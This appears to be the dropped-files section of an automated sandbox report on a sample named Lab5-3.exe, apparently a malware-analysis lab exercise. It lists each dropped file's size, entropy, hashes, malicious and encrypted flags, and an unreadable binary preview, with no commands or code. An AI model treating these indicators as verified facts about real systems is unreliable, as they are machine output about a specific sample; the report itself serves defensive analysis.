                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66416
                                                                                                          Entropy (8bit):7.996661726150956
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:nIU8MXD+corztA47mlYjjghukr/+OlUatMzCI1Z:IUVXacorJlmbhuQbHI1Z
                                                                                                          MD5:D4ED8FB880312A3737CC71C911E8C47F
                                                                                                          SHA1:6E5DC3E1E9860BCEECA5C3970A9E4E3A9EE60CCF
                                                                                                          SHA-256:82B8E08261FE42427C359A7EDB244CD0DB525FB544E5C854135BB71DC1E83FE4
                                                                                                          SHA-512:1A2CC6E1749B996624C24CA49B0627522FE919603980CA0FB5A51B42B938275A2C0527FC050D12CDC7BE9BE2F798910D5543EBD1D2D32FA4380BB0B877C6F3E2
                                                                                                          Malicious:true
                                                                                                          Preview:..F.3.e......+.F1nSEX....T....3xA. y....T......N....>.8.'C.....2..._..vy...f.F.o.`I...j.....5_.qe.W.J.V..$..7`*.t..u.....i....X..y..nmX..6..J/f.s..+7I.....d..*"....Pa...(v.qU..~.#."C........9p.}..~.D).....q..{N....{...kH.H.6.Z........@.....O.Az..N..F7:.E....w.I.F......G....0%[,5}.t...%.......8..M...ju.......Gmf1.#?p..d.).?..8.h.2..=..|.1.ye....+w'?.v.I.5KB..>..........\.Z.~t....u.......A.(b.Y._.\.{B.#p..8M..T....q..]..sD-...^.Wm..).........^[....Jw.p...2.l9.....%..Ac.,...ly.F...b.Z..i.Rk..z.3[.CI..z...[m|..~2.,.R..R!.z....g.M./P....uXjZ.|.`5.;l'h.......$..&....l&............y+q*3..&/...`3..$.....d.!.......9(...I._..G.....,.1...'.;6.<..aJZk`..}..EL...-..3.......;...LR?}..HE..u..y.za.......^.......i....UDF..._@....Z.zI....J.5..=..................a..W.X6/.-..5J...RY..-.a....=')Y@...).A(..S.M[.N.=..........-5.....<.t.y.x..mf_..A....&.....LWo.....D~^.S.|....M.u...Z.-...Z..9..>lAg..W.&.C.#.......jJ..+,..<...,D...Yn(.O;A....e)......h...W\
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):75744
                                                                                                          Entropy (8bit):7.997601931605045
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:D1weHEAxTWMaxFM2BRQf7whil6DWEf6QMjqKv0QLB5CeiDzocnW+HkkZ:DKz2TW9xRXQf7zQ8bv0Ql5CVzom/HHZ
                                                                                                          MD5:1D1ACBA4F9061CA1A51132F57F0FE03E
                                                                                                          SHA1:1BCEC75A16B41DE1C7A468375ADBB045C6BB697B
                                                                                                          SHA-256:614D38C3CB2F961996ADBACF96ABC165ABC01B001692A09CAEBCD6FC09237651
                                                                                                          SHA-512:DC11655ECD35F03116430C4B37E9ACE11215793E4B08088801373799E6E0A462966B35B9E6B4741E118ECFC568D34B29AABC4A38A81F16A2867D5A5F77321484
                                                                                                          Malicious:true
                                                                                                          Preview:.C..3.D[x..U1......'U.j.I5.j(4.q)1...TW@Z...>xb.U.....O0{y..y+..~.+..#Wi.....%.^.*...=...5..W.`3...s./A.I.z)_.K.g'n.{>H.}.:..e..|..[.....d.;......).H=_..s3.*...9.?..!V.N...|.y.p...[.......=..v).N...Jm(4&.....L...;p....u.9.I.....eA... ..b.7Y.:.....:.`W.f.I..C..8.._}|#.,..+...+...8..tS2....3.....{Wa.-..~.`4.>`...S.u........A....|......h2....x....-s...4 ._w|d1....y}D........-|..*F.....`.......f.(..}.......$b..I.dL..q.hxu.^...?.e.#.GP{.ww ......%...,u....0...U.v...T.X..-..IR..av.....q..1.r[..|D.....d...F...}a....a.d...K.+......HA...fI._,....,......<n..|a.Q.......7....p...[.Z...6&....t.F..L.C.MO.kF.k...&.=R....$X.......<..hm6..3..[(...=..si....0....tt.Fl.F...G..*....%..r.B..BC.+.a..../.7.,W..........?Gy....).5....A~.X+Y\5~M^.".....4..i...q...=.2.b&.+..E.b..........G.,!.....x.Y.D+4...F...W..9q.F.U...9.A.T....)t.`G..a..r..b.>.yW..M..,$..e.Q..K...2q.j....G......~....?..|..8.xK....Ou7...R.H..D,....i..-.......H...)...j.M7....S>h.dj.....C.X..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66416
                                                                                                          Entropy (8bit):7.997323365555505
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:xrGUcSBIQIIK5GSQgn4MVNDkxTYhpI1FeHW2EIZ:xivS2QTKDvFNeTYI1QWSZ
                                                                                                          MD5:09FE5176E50AA275296FB490DB78BFCE
                                                                                                          SHA1:54CF7848E0C07E69B70C2FC9A5993EC4A6B852DC
                                                                                                          SHA-256:D097521A8207AF57A623B7AFBD65B5686EA498B10FB7A119DA50B232F90723A6
                                                                                                          SHA-512:F8F6E7B29895FD7D36FC2AF52148D0FF54C17DC102F466556D53327562AA044E3120232025F44E93E8E5EF8EC76C3631B672C1D390A8E7FCB72A1F8C57475BF4
                                                                                                          Malicious:true
                                                                                                          Preview:6.O............T... .+..0.2..#.|..._...8..Zj..[..+.9.m.I..9..l.Mx..r...S.*%s.........W..n.Krm.#T#.........(...#L.Z.@.=0._.7....\..{8=9.:........i.D..O".../Y..............}C.....'E0.t.&.%2A..CD.........2n...3..^P....^..(k.S...}........sZ.5\...........&x..N....j@.I:@'G...t..`Z*.'I..r@.P.."...l{n...i..v....5v.....A..+.....Z....^.f.-.~a......7.T..Y.`.C.J[..Z..j...e.}7..X.C...6.W.=/....|..J.z...d ..y.}.D......?<.a.4...."&O.^.m.Hz.?...A....d&n.jGj;.G}.Z..aZ..~Z...T.W...@.X....oQ..T.z=k.0.Z"=;.X.f.w..hn........FVR.&?...Y..r....}.3...?..r.........f...fk../7...m...`W..@...L8."`.. .Qo...s..O#....%..[..Z.......j...."i7..=H.;.z........[..).fXIICVM..e.7....:XS1..B........P.A<......&|....ep.%..6...N..{;.K.-9.%#..8..k.@...D......p5..S.8-...}Lh.K.....k...U..X...\..Zm....on-.a.:^&...uv"..{...{dQ......t...v.z....Nd.D.|.......UV...n.Zo......0af.r.rd./6O.46..j.!r...P...].%.H\]..\Q.9k.%.i.^.._..@O>.M...ShO`.d`.b.......sj..t.V....L..}9.w<Z>..F....]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):75744
                                                                                                          Entropy (8bit):7.9974880330096525
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:YH4fGiZ9R0VQonp0ohkEFV6F1gryI7lY3DWxM5KJjZFPaNBZ:YY/ZKQsOohkEFV6foxS3D6M5OjHyZ
                                                                                                          MD5:3297182194F163AB8486BD380E21FE3F
                                                                                                          SHA1:9584D4592DB83AD29855392FE60E0DB0B4EAED00
                                                                                                          SHA-256:030361B26E346C86DF96C5A8DBA87BD6B15067231CDD1FEFDB1BF514ECACC4B7
                                                                                                          SHA-512:BE6D7A5467124431143E5C0E8F9391AEE02667610CE8C01E8384937A9CE4F8E322F17642F2FF8C15723ADD3DE0DEB6150F5F8D70214320BD3103692D6944E49B
                                                                                                          Malicious:true
                                                                                                          Preview:A..SL)...D..NZ.J..:..\5.1K"...)...C.wF.....E...y.OO`0?..i..:P%#\.^.Um?.EfH7..:vW.%iK?.B.^.?..sg..I-i..}.....>#i..F.2......E@l]rI.h../o[.O.X...2.tB%&.p3.......U&IKV..~......Z.[.8}0.W....f......Bf..4(...{..b.........|v...R........sp..O.X...Y.9.)...sPc...>.s....>..t6.n...)......Y......"..}1p..}o.i%~....8d..i.~J._.....\-.3.}.....3MY.k,.....L...)M...'./..F.A^.Xt...#w=.G.e...dY.\s+ztZ..$k..%..a8..:E..:%..U..!z..-o,x.&...M.T.......-,.E4%..F.w..q....S....A*ss.......i.CB...n./86Z..Mg8...<5...$.7.[Fto"%.78!...v...kLc..x..-Pa....."...q...A.......wzS`E.U..=..5k......q.e...1..TB.....x._.uB.......*X..'..e9)..'`.P.V.s..H.6...6`G...[{>a#..GC../>.U..>.DB6._.......:_......}........Hx..^h(]..1.W..F..b.....UK5I>.p...._.eZ|R{-.v@....>7.1..V.i.Qx?..$...P.kGN.iBz..<.K?.l....N.ar4.&..)..t5n.Su$.U.I......CDK. ..0.=FvrP.k>......Z.m.V.y..S....&R...;..P...g..KC..N.0.h....p.EC..55.F..N.4x.....q..K....f.....7.c.w;.W.5f...4}.....A...9Ng.gJl.z.....8...3.2...#..t.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):75760
                                                                                                          Entropy (8bit):7.997506372869077
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:dph6sS6VqH5PhwXKYWAeusTClVesWEa7JuNle8dQdU5VtJSorXI/Mf+lUurltykZ:dfpHwo/nuElndQdEVtJSorXI/MfurlRD
                                                                                                          MD5:2A403774687E40FCFD15D5E2D044D7DF
                                                                                                          SHA1:191EB5663387CF8BB9CA23C27334F226BABD4CE7
                                                                                                          SHA-256:E85C4C8E54F3C106929910B6185EDB5E05DA1A5574681C13B6522639C85B80C5
                                                                                                          SHA-512:392BD5575458722435079E38A980DAE9A82A605BCE8D2C177F3F7127256E848C00F67626B34ED0B6F9327171B9F17E6A581F78AC3A89F6F9F04C53F27C0C6FD9
                                                                                                          Malicious:true
                                                                                                          Preview:....+W..+..0.8......w.}.8*....Yl.T..x..M....F0.....;...:..{...\..w...9.y.3`.h3.......,...Y..k.C...@.......=.....".l.....y.".Bvz...]].;...q..Ip..{....q..>......Z..t..H\..{J.u>.....|.9.X".D;C..SU..l.w...y.....!.H..i!.~.|.O....ES..C..Wd..g.ju...F....x-.D..r.xB@^U.0.bS/L.....P.5...'../.."3wJ..Kg.7_.y.U..1..R.YV..|.s.jS.W....p7S.|.#&......v^.2....sm..../d/$\.B(;.]...].e..S..EEQ..c.6..>..;._.JrD..Ae...3..E4....d.WT.6.V.....Q...W...E3......x7N.... 7...K..`.#......'.1He..+k... ...|.!WD.B....s.U....9.I'l.`.7..".~.I}22..L.y.Q...../.U!..'........f.........%$.hC...\.. F~.#.....U.G.S.p.5.2p1..T.X..%?A.{M(."..Z..R.j...@..#..(%...z... ..&-4.3QG[r..\...F...XYp....\..H'..M,Ta.L..f.SG...#.V.x.......6{..O._x..2z..[.Jy>s"H.V.......G.QCC..0..QM_C..W....@D.^r..m.Yz{G..<......7..xtf+z0(.*.....s...f...? E'.M........T.G?{.!.*E."(./fY..*1.&>..(M.%..ZW&,9.s.0n0.KQ.+.;.S^3......].v=rA.p......[..........(........ ..t.E..+.I\....W..p,..{.#.....}.N.K..ld.D....TB.[...V..n..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):75744
                                                                                                          Entropy (8bit):7.997362325807314
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:fWAIvJJwflBitYXQ8Mimfmn83e2bmR4bJBm+MGsY7MhzZpf2tVZ:f6JiNBitwIimOn81bKuncYghgZ
                                                                                                          MD5:CE3880800DFD683012A6A0EE3E537278
                                                                                                          SHA1:1477589D4A551293BCD13890A270E19A78E900E8
                                                                                                          SHA-256:8E4E8EE10920553201DAD269B8C08C852726F9E6B0EE0D1D88FE218323067BD7
                                                                                                          SHA-512:CED80850845A4AE4E484C6F7FA266F2DB2295F481F4F41BBD7150183DC36823FDF17327E7A1D22DBF169085F85B5664B23F37414A48D6B423D0C31005FDE59CA
                                                                                                          Malicious:true
                                                                                                          Preview:a)Rv...y.a<.F.I..."......f_,...j.gR.M..z.T{...{..4....H.y.......r..mF....[..=vE....0B....m.d.~f^.&......hf..)V...M8....!..e.mK..G=/.,.....|.)...H..L)C.5.....h........S.(...l..]....:..5..VZ.......1v.=.)0.lDpg.T....."...I....-...U...0.:&...."V....2)f.0.iQ.x.~L.Nn&.>8.v.X..>....c?._9..5j.. !.)z..C..W..F.'.b.:[Vg..E.S.!....e....L..6..*.V..w\.~].:cq..4H....F5.+...6....?G...H._."0...<.}{.Vl..1.R-5JW...F..*..E.5.5...E.7.|..,.Jv..r.pG.g[_[?.i...@^.........dU..........!.~...8...$.*2...Cl...........&......w...Q...9....AT.XU....H&nh.%.G.CiO"71..^..$.o~......_ ..w...WL{.......\8.O..bD...4N.E.e.PM...~2.,.-r.w.X.R..q....q.......G.9)M...?...O..#....\.R.......E........U-$C.%.?.F...I......_L"..............=.Jp....Q...sE.....(.,L..1........T..!..<..}....\j!.....}.1.....m..`T...).........(..z{..'.TIi..V.+.a..L...%a................5....}P.N.0.Z..e.Sg.0/.t@b.]s...Ds...%..G..M.B.n.M.."m<.....2..c<,bk....l,..Gp.... .5g.6....8..%[.oc...g.Wr.4.NI.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42166152
                                                                                                          Entropy (8bit):7.9488840143742685
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:786432:TKwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I591:/QcWxDMPnN+dk65gGUjku4vNjLj1
                                                                                                          MD5:DD0D1A98C89FEF57C380A18D3F82C088
                                                                                                          SHA1:75501BB8EF27A7DE28C9BBF9E77E3655869C9C60
                                                                                                          SHA-256:7189382DD7E0DA3686EB4F3E674CDE94A1B69821F3DAA6C4D060EAA9ED1637DF
                                                                                                          SHA-512:1B35C7F29471291A7EF9FC28377846EEA0EF4D8C7CDE4BA484D296BA10DFF6F871A8AC99A0E89F4F6576F5F4A4E7ADF3FA92112FA42F49F9F80D1F075108448D
                                                                                                          Malicious:false
                                                                                                          Preview:....M..@...%..._.......D....3...9.r?...+g.5=.......mA.......U.....}8........Yr.0.~,....#........N(f<`."Q.lv..F..g...b....[.s.3.5\{.P.f.az.....f......Dz.6.%.-..6....2.X3.B..m.p.g"...G.ck7nI...y.....|...Zvc.[v.m..>..........\t..p.%i.scL......x..|...5,6.A.T....ov.,...$....5h..V.i..)..<..~e....L.E...z.....O.n...7g:.....-...Q...&...\C..0{^1....(h..`.kq?.c..aD:Y.<#..U.(.l.j.eszq>..=....*.h&d..P..}...J.T,...T.w..kB..&..F...w......'6..<.[...'.....!g=.a.P..Z.V..-....:..[.W...R.Fl..d...{.OE.........#{.....j=.m~..d.%.h.+.d..#......H......./.8,kz.K.......(:j>..X/.p8..\K....vG(5.....[..B..B+|.}...x.........v.{......s.E.Y6.U...-....*..A.....~q.X..Z........o.T....'.s....1....g=.".]&.u[a......K&......-U%".W.j3xQ....../$m.....{..y...].9.O.H.F\...h?..i...1P...HPo.$..)..)......@..v.,..e......~#....5..Z..O..pY.e..;.V./c{N.?..PO...a.kN.......}|......4.+f..].....{1.G..R.1Ev.D.%.[l)..AY.TJ....G.]..n......=....1...i4eY....W..T#.L.L.g...5q....:......pR
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.929268165949842
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:X5YZ1GGFQEg/PR6Az/wRuNHfUTid3hBaUoSGFcmeykEdEElU92i:XS8GE/pTzyGx0uKeY2ElUJ
                                                                                                          MD5:7AD71FCEE34CB1711F823683EC195F59
                                                                                                          SHA1:B63A14D894BB2BFCF6C4E305CD8C64054E68DFCB
                                                                                                          SHA-256:3C9F6CA00B8D37234DAE7336FF35FF0EBB0ADFF1ADC2919D2A3CFCD821567096
                                                                                                          SHA-512:7CAA834BB016775A6D60E9A63AC9AC5A6B0105E3C3D655DD4F07D9A78A2C0C8880E512AA0EAAB88409FE911BD1D0CCE32BE2723649E5B8FA43AE43FE7B2C5244
                                                                                                          Malicious:false
                                                                                                          Preview:&N.d......... 9"..w.....s.OfW...z.......H0..+O.X...0.o..Qv.......u..5 ..:....&..A..zl.#...../2J.7c....jw...c#6.)o...Px..H.r}.)...Q...:K7RE L....Z..f.O.0..L.....%>$.%3H#h.Dr:w.f..pr..#.......\..*Sl.7...+...<E2J.HEL..-..S..s..#.....-.HkV.<...*.j..b..]F.\~w.r}.j.....D^l!..E`......ik..1,.....T..m....{....m.M.S5.=|..A.s..V.8.....Px($.=S.T.l.^c.......f.t]$....\.PL."1.....s....ti.`$...O.1)|.~.xt?.._.<.>....'...u...a.;.zE=i.k.#M...;*.....H..... ..r.iU<8......}.....s..Y*.B.s..:...C.8..C?..t4.mA_....![!>..`V?.W.5./.Y.H?%....7...."....s......fa.S4..7.v.....5..R.`......AE..=.d..c....1....$.aLr.g.0.G.]e.H6....H...zD,.....G..Z.......[.....m*.......2....dme(...T..2R..8.~./.%h3.oG..{x.[../..T...5.[s.pX.41.N[.V.H....U..3..C...\-..=.s..........G.I._#.._...F."}~.)D/.)Y.Fk...QC8....?...w7..b.....A.R.2u......I......WC.,.S_.......g0...N........*)_..M.x.'.]9.i.j.."9.!rw....l.@7.3.%....s..`...1.re..l.:{4.....m6....rkg%..N..|..P...^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7360
                                                                                                          Entropy (8bit):7.974111022872935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:5uuQBxH4ng+VQ7aG3yChiHjrXSvjuPhdwWbVUUN0Cb:5uf34HjrXYuPXHBtb
                                                                                                          MD5:18FEA0CA46160FC3F20892CA2A5F5F93
                                                                                                          SHA1:50887792247175EF067771F62F8C99A721E0D7E1
                                                                                                          SHA-256:0E5A548407DB4535471ECA8B1B1E690C3177C4EAD7984B17C6F680DC8687D7E6
                                                                                                          SHA-512:FCAD73A729CB8A00213FFB5EAFA595A02CABAD92B96403231C237D3D8E8095E94DF8D3287FD8F538E95E3C86CEEC04FB81EE7B07A4E0C3C17CB4E34F4F927513
                                                                                                          Malicious:false
                                                                                                          Preview:..<.|.&_O..eH.......>.;T#"^.,.]....VO\j.........}.R._.....^%..D.1%G.......9..N.U.."......j.zO.?.3..o'0..6i..^F.:fR..m@a.........T.FC.o......1.U...0........l..R.?..3R(...+....*.s[...M`w....k.]cAz^...r ..s..z6.W.G%......Ln/1....Hy....#.~ ...&..B7..a..w)]#...V<k....?.H.I.JP,.%.`y.$T.K$.\1..........d....1..&.XD...(9...dn..u...K.....e.....NKe..w.......N.#I..@h..md.k~il..i.8.....fI*.-6...Z.:.<......*.#V4..l..M+.o.r7...<4.&...J..].`M....KF..ui.:..;.V...B....dz...sI:.......}.3.Kdw.Lb%....5........[.=........&....m}.J...i.uaj...q...3b.6......b.Y....w...\..\..\...c...zV$/..?(.(+.H.,i.@.9.V...M]...]$eY.(.........as<.;.v.;.'sFF.D...;.5=I....@.$.F...m;5.u.Q.7Twn..&..V.ej...x{........U..t...m....2.w..7k....=..D`......90...be....wv]....M^....g.z...A.x..{....o[...QS0.=......t*$..m......>..q..u.ii8<..o ...].g.x.Ns.,2.-...J~5......X<.CNe^)..Y..v...o....ic$Q`. |.:..tm.;..y...1S.n......)>.{....+3..SC..?+]..*)U..mI....]..e7!.c>....8C"2..5..< N+.Wr.d....R..&.|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7360
                                                                                                          Entropy (8bit):7.97167756301487
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:DpXgKgW08OgahWPx32zAOJfR3/MOHw7zZa6VPOD0Cb:JoP88hGQvvM77dJODtb
                                                                                                          MD5:B8095A4167C8846736D7DDB87DB42364
                                                                                                          SHA1:82F6C1B5BE54F783E20B2DB2302E6756128974C6
                                                                                                          SHA-256:3400F9BCB1FF0EFA4FAA575AF582F5C52B6569653522F456C98B8D32D4216685
                                                                                                          SHA-512:87E8E9C35166B0190DC7D60DAA2A0DC2E2A458F4DFEC988C3E2A7880FA544F34727A6B8B580B4E3FFF8B1AF749B997E21AA1C8476753595ECCE31BFE65816E02
                                                                                                          Malicious:false
                                                                                                          Preview:.b..q.3-.]....o~..,(9..G..C.T.....+.N.B...<.\.....)....E....H.*..Ae...8p...E,..?...7e..g.A.U............} #./.w.x.......Z...<..b.:..g.R.E..._..J]...d..#.{....p....sp..O....!'-},*.TICr.5..B.+.q...n....;....M..P...."#.uc.a..(.....XQ,<...(...(....].R......."....^..l.....1..F-)...rp.%.:&.w!.X.eoe.g.'Yd..(...o...53.,..'..x....%.6.5...]hr.S.;.......%....J...EOx]...-7.W.+H"....j.t.W.q.....%...."0..$D.>...P.....y.|....D...e.i.5#./b..H.......cxD.J..HK.-9~...Q.iEUd.......A.+...=r..xJF~@.....n......+h.......g...o..X.9.bp.v.3.(QO..@.8.5..l..t`?..t.W..1...P..*...ftv.%@....d.0.m.+9Q.y"FX.}v..3.GZ..5.V97.y.1Y.........u.c.:qK.ex......(e.G.#.b..AY.&..g.=.....%j.........@.+.c.[5.:...U...Gs2S.."^~9.y.e.2..zVq.yq.7./B..I.'..Y.......|A.6._9m...6...W....y.^Sz..-.a.b.n.?C.1.....'HZ.|.T*...ZG...+o...T.d .P..'...[V~...S........7.....F\,T.....B,.._0N.j......p..@'..b.n....Hf&#.V..`}..2...J..O.0.5.??.......5..Gz....O..s..{.t..tX....r......1j..u.N.....o..$.../.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7360
                                                                                                          Entropy (8bit):7.977040353477501
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:AlM3vyBonsO/a9l0H4BRkmXvyjw6vgbYVzXxmKlMXl0Cb:CdosOCQYBJ/G7VzzWltb
                                                                                                          MD5:D071D957A5DA944275F12CF614202DA4
                                                                                                          SHA1:3A41639A44041230885D9E7FE12085CB87E271E7
                                                                                                          SHA-256:82E353F753749AEFD8E0DE7146072154EBEF6289A3E1326C15AB08568A229829
                                                                                                          SHA-512:2AD87D611C942EA51630586F3C08F77C2F3CA6B6E1B6BC62D63A28C08F59370A0219FEA1AC2E1A7F645A53B0CF93C2129BE108C7226D29046B4F779ED1744F31
                                                                                                          Malicious:false
                                                                                                          Preview:\.S..^...M...^.#Y.qZ...P......@.U*tE....T...:.hLT.+...g..*.q.J.Y..D....DCp.O^.s...g.p...U.P.`'.....il.d...m......nf....N.V]...r..|....8&..>.0.....U.^ .....tx.t....%...z.H......I.b....<...*/t../^.....~.F.wf...1Q..1....H.xy.,....W..>8.0.<.'.,..2..G........&...8L\......,.. ..ON......I....%u..(..rC....=y1.N{.g.bc~.S.X.'.k9.;..r^...Z..SU...8<f..N....../$o.v<.v...".Z..y.....0.....V\...........7....84..1N.......tR.$.r(.pA..Bx|..:......:...ZY..XQ.z-("...x..,._=.`_U8M.t..J.....4.*../..5...?.f...3..fl.XO...\...7..I...F....(....c...)'~..=...b..8....4.@2..8..S....;.2.d...z...X.&../..q$..&..,_(it.V}I..vS...L.....).s3../e.v0..8yv.g:..H.}7.`.<.?....j.Huj.....d\...6.;.......$.\..f.st.~'...f....1..E..H....x....8..M...-KL.....t..t..V...V....9E5.\.HD..v..C..................EX....[z..=!.h...@..@G.2.....M.f'.....s.L]......=..3...Y.}.B..7."..(....yq..v....o............4.=........"nF...i.M.zb...,.e.;_A.F.F.d..]...2..........<.V..F&p<.l....D....<..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7360
                                                                                                          Entropy (8bit):7.973244765038048
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:UYSW9tWV/hvUDcfhzr1abpd4EadhoIJC8dlIp0Cb:RSBV/aQ1uKEadhod83Iptb
                                                                                                          MD5:5018660DD0969814ECDAFE3D425B6AC5
                                                                                                          SHA1:AA12E2BEAA6C58BE0D3F045BFCBD286CD63BEEA8
                                                                                                          SHA-256:AC50834F68EF4F697DB7787B546B58DED686376E4CEABE010D2FE5C32B556D20
                                                                                                          SHA-512:D141C46F656DD219EB3C71517E7F03A396FA61FAE0B92CAA50A4A76B6F29E1CDA220877B5625605503D3959799A76DBC2997A6F8D3C4DDE5738605F2BD9FE53B
                                                                                                          Malicious:false
                                                                                                          Preview:..7.m..Q)....=m.5.;2.2.uF..A...h.bB..}....i0..V....`..3.......Y.....G.RZ%....}....&E..y$J.r.?.u..u.2.?.82. .+.lK.".!..$..."...%:....b./ z...A...%.x.z.......e&8....<..d.....c.)..`..d.f..c...2@@.t.o0up..@.*..R......yse.....z........J.9].l.......<.Q.h.9;6n.L....j..1J...=..2*8#`...l...e.r...'.^.l.../..;>$.m..?.p.).QZ......f......a^..]..l....../.!#...i$.0;@...]...-....5..@z|n*.O..~..W..|.U...[..?..S...J.R...e&......G.N..0.p.`..m......)....l.h..X..I&A.?.........\.}...*.;..{..l.L`.."4#]...ZX\;Xx~.$.p.R9..d..6d50e...D.^....X..kx......_I).*..5.?-P...%.36X....Tv_R.KZ.S4..l+..S3..V.1.S..E....u..E.S..X..k..Q.}. ...........}...c.j.D.......*q...*q..S...ls......7H....,5..:.q.9.qC..O..G..5.D.....w[}F. !.0.*v.,.c+O._..G..*..tu.e.e.....7.....7tGJxi.K9.w....cW.RJ...0...g..6.W.[.4Y..JW...B6sebN-Jj\...L.W..sL..m]JS......<9NM.x'S.u%......M..9...k.........1.....b..7^........]p...p...!.pO,..6.q.S....S..K3..+..$........eS@...Jf..An..I..J#K...8...p...!.?..yU./..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.929277472992856
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:O2Ih8mzZMMRmsIj3QF3AJ2+HfUTid3hBaUoSGFcmeykEdEElU92i:3md7FSQF3AKGx0uKeY2ElUJ
                                                                                                          MD5:C7E2C13DAB330BFF3EA6666BCC22AE84
                                                                                                          SHA1:14915D7C5B5A3ED1EFD747ABBA7090FAB02704B6
                                                                                                          SHA-256:C03E0D6425FCC4CACF26CE0F1611458F1748B196EBE411D9393AD1B71916751A
                                                                                                          SHA-512:1A21B19705A933C709383FE8A666331B14E414E1FD19191E6F1932127205033C386019CC2CA0C4D464313BFE59FE0027B719A8B3876F82998501ACA8C0849D8A
                                                                                                          Malicious:false
                                                                                                          Preview:......PN.A.pg...!.R...].].?~.T.L`{)4Y%<u..K....R...R...............q.2.i..1.k.....8..b.6x.......E.....^.U,j.........0....P4.W.'........0].E...P>5..e."Ki.E.JN..ul..`...'g...z"J.W....}!.a[.h.W...C.{...D...t.B.....h..K...............^&.m...d..H.Ofu2...U.7.jq.M..h..........d-.....0.$..k5....Sj...Z.Y.Y.,./.T~..e..0..Y....W...&4.).6y..yT.2.j....xJn.......x...."..S(....K....Js..7....<..I.X........+.SG .jL...e#....B.',..c0..8.....0k+.S..`....R.+...4b.....\........e..Z...o.....t......q6&...wc.6...#8.W..lRm.....D...H..#A...F..Z.Q.I..@.KA.Z<.E.`g..Z.e.>...&........uyf.;(..j..|.Z.</.q.N$.........Q...F....SK..N..rc..l.[........;m+.W...(..+i.&5..%.@M..x...~`.K.w3.|.J.N"....&7.q..sV}*#p<.!.V...-(7...._DC.z.I.Ra.&.:Aj..9...!n..'......\...mtGd.!u.a..I.c...+.L....8...`!l.2.mu..6nn...N~.u1.y...P....~......Q'.T.....p.(8}` ...1.o....@..k../....S...4.E.t...R.rv..........P...|:..i.....e.4p*..#RC....l"..6.d5.........J.....(......y.....B...w..A{.MjB.U
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9371364013541115
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vJ4WHfJddZy33tSvZdMXrxdUaavRLAOHfUTid3hBaUoSGFcmeykEdEElU92i:vJ4idm39IZdMMaaJLWGx0uKeY2ElUJ
                                                                                                          MD5:97F157978BF6F7193190BE3490FE7E8B
                                                                                                          SHA1:ED218E9DB480DB5E333701DD9747308A5705B49C
                                                                                                          SHA-256:91751A14D256D2C43159FABCCD203DB8931C4B9C2BF7855608899F81174392A3
                                                                                                          SHA-512:39565E92079AC71F01B3EA07956D5CE7C14BC5EC523D17234B7152924405C232A3B7CC18B19AD391FA9FAED2AE0DBF7D5A61FB148EB9B78B2A7A9DAC9027B19A
                                                                                                          Malicious:false
